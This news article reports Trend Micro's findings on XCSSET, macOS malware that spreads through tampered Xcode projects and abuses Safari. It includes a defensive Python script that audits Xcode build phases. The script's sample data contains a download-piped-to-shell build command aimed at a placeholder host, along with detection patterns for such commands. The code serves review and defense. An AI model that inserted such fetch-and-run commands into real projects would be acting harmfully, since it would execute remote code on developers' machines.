Third macOS Zero-Day Attack Takes Advantage through Safari


There was a time when Macs were considered safe from malware and other ills. Attackers preferred to go after Windows users simply because there were more of them – attackers could get more bang for their buck. That has been changing, however, as more people own Macs. The result is a third zero-day attack on macOS in less than a year, one that abuses Safari in several ways.

Discovery of Third macOS Zero-Day Attack

Last August, security experts found XCSSET, a zero-day attack that affected Mac developers. It gave attackers access to browser cookies and files, planted backdoors in websites, made off with information from applications, and left behind a ransom note. This past March, SentinelOne researchers discovered a library of Trojan code that installed the XCSSET malware on developer Macs.

A third instance of XCSSET has been discovered by Trend Micro researchers. It relies on two zero-day exploits for macOS: one takes advantage of a flaw to steal cookies, and the other takes advantage of a development version of Safari. The researchers found the attacks to be “quite unusual.”


“Malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects,” reads a blog post on the Trend Micro website. The researchers believe the attacks could be widespread, as the malware was also identified on VirusTotal sources.

The researchers detected the entry threat as “TrojanSpy.MacOS.XCSSET.A and its command and control (C&C) related files as Backdoor.MacOS.XCSSET.A.”

The Harm that XCSSET Causes

The malware spreads through Xcode projects and modified apps that it creates. What isn’t known is how the malware first reaches these Macs. What is known is that the Xcode projects have been modified to run malicious code when they are built, which is how it reaches the Macs and leads to user credentials and other information being stolen.
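Because the injected code runs as part of the build, one thing a developer can do before building an unfamiliar project is review every shell script that Xcode will execute. The script below is an added example (not Trend Micro's detection logic or anything from XCSSET itself): it parses a project.pbxproj file for PBXShellScriptBuildPhase objects, prints each Run Script phase for review, and flags a few generic patterns such as a download piped into a shell. The sample project text and the heuristic patterns are constructed for the example; the pbxproj object layout it parses is the real one Xcode writes.

```python
"""Audit an Xcode project.pbxproj for Run Script build phases.

Added example: lists every PBXShellScriptBuildPhase (a shell script that
Xcode runs at build time) so it can be reviewed before the project is built.
The sample data and the suspicious-pattern heuristics are constructed here.
"""
import re
import sys

# Constructed sample project.pbxproj fragment (not a real XCSSET artifact).
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
    objects = {
        AA01 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "swiftlint lint --quiet\n";
        };
        AA02 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s http://placeholder.invalid/x | sh\n";
        };
        BB01 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = (
            );
        };
    };
}
'''

# One object in the `objects` dictionary: `<hex id> /* name */ = { ... };`
# Build-phase bodies contain no nested braces, so [^{}]* is sufficient.
OBJECT_RE = re.compile(
    r'\b(?P<id>[0-9A-Fa-f]{4,24})\b\s*(?:/\*(?P<name>[^*]*)\*/)?\s*=\s*\{(?P<body>[^{}]*)\};',
    re.S)
# The script is a double-quoted string with backslash escapes (\n, \", \\).
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"(?P<script>(?:[^"\\]|\\.)*)"', re.S)

# Generic patterns worth a second look in a build script (constructed heuristics).
SUSPICIOUS_PATTERNS = [
    re.compile(r'\b(curl|wget)\b.*\|\s*(ba|z)?sh\b'),   # download piped straight into a shell
    re.compile(r'\bbase64\b.*(-d|--decode)'),           # decode-then-run staging
    re.compile(r'\beval\b'),                            # evaluating constructed strings
]


def _unescape(s):
    """Undo pbxproj string escapes: \\n and \\t become control characters, \\x becomes x."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)),
                  s, flags=re.S)


def find_run_script_phases(pbxproj_text):
    """Return [(object_id, comment_name, script)] for every shell-script build phase."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj_text):
        body = m.group('body')
        if not re.search(r'isa\s*=\s*PBXShellScriptBuildPhase\s*;', body):
            continue
        sm = SCRIPT_RE.search(body)
        script = _unescape(sm.group('script')) if sm else ''
        phases.append((m.group('id'), (m.group('name') or '').strip(), script))
    return phases


def audit(pbxproj_text):
    """Return [(object_id, script, flagged)]; flagged is True when a heuristic matches."""
    results = []
    for obj_id, _name, script in find_run_script_phases(pbxproj_text):
        flagged = any(p.search(script) for p in SUSPICIOUS_PATTERNS)
        results.append((obj_id, script, flagged))
    return results


if __name__ == '__main__':
    # Usage: python audit_pbxproj.py path/to/Project.xcodeproj/project.pbxproj
    text = open(sys.argv[1], encoding='utf-8').read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for obj_id, script, flagged in audit(text):
        tag = 'REVIEW' if flagged else 'ok    '
        print(f'[{tag}] {obj_id}: {script.strip()!r}')
```

The heuristics only decide which scripts to read first; every Run Script phase is printed, since a build phase that looks innocuous still runs whatever it contains with the developer's privileges.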

Once it lands on a system, XCSSET can:

  • Abuse Safari and other browsers
  • Read and dump Safari cookies
  • Inject backdoors on the Safari development version through a UXSS attack
  • Steal information from apps
  • Take screenshots
  • Upload user files to the attacker’s server
  • Encrypt files
  • Show a ransom note

A UXSS (universal cross-site scripting) attack primarily affects browsing. It can:

  • Modify websites
  • Modify/replace Bitcoin and cryptocurrency addresses
  • Steal account credentials
  • Steal Apple Store credit card information
  • Block the user from changing passwords while stealing modified passwords
  • Take screenshots

With three occurrences of the Mac zero-day attack in less than a year, there’s no telling where and when it will hit next. Trend Micro suggests users only download apps from official, legitimate sources and use a multilayer security solution.


Laura Tucker

Laura has spent nearly 20 years writing news, reviews, and op-eds, with more than 10 of those years as an editor as well. She has exclusively used Apple products for the past three decades. In addition to writing and editing at MTE, she also runs the site's sponsored review program.
